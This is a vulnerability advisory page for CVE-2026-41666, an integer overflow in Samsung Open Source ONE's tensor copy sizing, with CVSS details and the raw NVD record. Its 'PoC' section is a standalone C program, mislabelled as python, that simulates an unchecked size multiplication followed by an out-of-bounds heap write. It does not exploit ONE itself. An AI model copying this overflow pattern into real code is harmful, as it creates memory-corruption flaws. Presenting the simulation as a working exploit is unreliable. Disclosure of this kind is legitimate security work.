Security Vulnerability Report
中文
CVE-2026-41666 CVSS 6.6 MEDIUM

CVE-2026-41666

Published: 2026-04-22 07:16:14
Last Modified: 2026-04-27 18:21:31
Source: [email protected]

Description

Integer overflow in tensor copy size calculation in Samsung Open Source ONE could lead to out of bounds access during loop state propagation. Affected version is prior to commit 1.30.0.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:one:*:*:*:*:*:*:*:* - VULNERABLE
Samsung Open Source ONE < commit 1.30.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <stdint.h> #include <stdlib.h> // PoC for Integer Overflow in Tensor Copy Size Calculation // This simulates the vulnerability in Samsung Open Source ONE void simulate_vulnerability(uint32_t dim1, uint32_t dim2) { printf("[*] Calculating tensor copy size: %u * %u\n", dim1, dim2); // Vulnerable calculation: Integer overflow occurs here // If dim1 and dim2 are large enough, the result wraps around uint32_t copy_size = dim1 * dim2; printf("[+] Calculated copy_size (overflowed): %u\n", copy_size); // Memory allocation based on the incorrect (small) size char *buffer = (char *)malloc(copy_size); if (buffer == NULL) { printf("[-] Allocation failed.\n"); return; } printf("[+] Buffer allocated with size: %u\n", copy_size); // Simulate loop state propagation writing data // Assuming the actual amount of data to write is much larger uint32_t actual_data_length = 0x10000; printf("[*] Attempting to write %u bytes into buffer...\n", actual_data_length); // This loop causes Out-of-Bounds write for (uint32_t i = 0; i < actual_data_length; i++) { if (i < copy_size) { buffer[i] = 'A'; // Safe } else { // Out of bounds access - Crash or Corruption buffer[i] = 'B'; } } free(buffer); } int main() { printf("PoC for CVE-2026-41666\n"); // Trigger values that cause overflow (e.g., 0x10000 * 0x10000 = 0 in 32-bit) simulate_vulnerability(0x10000, 0x10000); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41666", "sourceIdentifier": "[email protected]", "published": "2026-04-22T07:16:13.867", "lastModified": "2026-04-27T18:21:30.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Integer overflow in tensor copy size calculation in Samsung Open Source ONE could lead to out of bounds access during loop state propagation.\nAffected version is prior to commit 1.30.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:one:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.30.0", "matchCriteriaId": "4DBBA2E4-036F-40C0-B2EF-D14AB3C83B6E"}]}]}], "references": [{"url": "https://github.com/Samsung/ONE/pull/16481", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.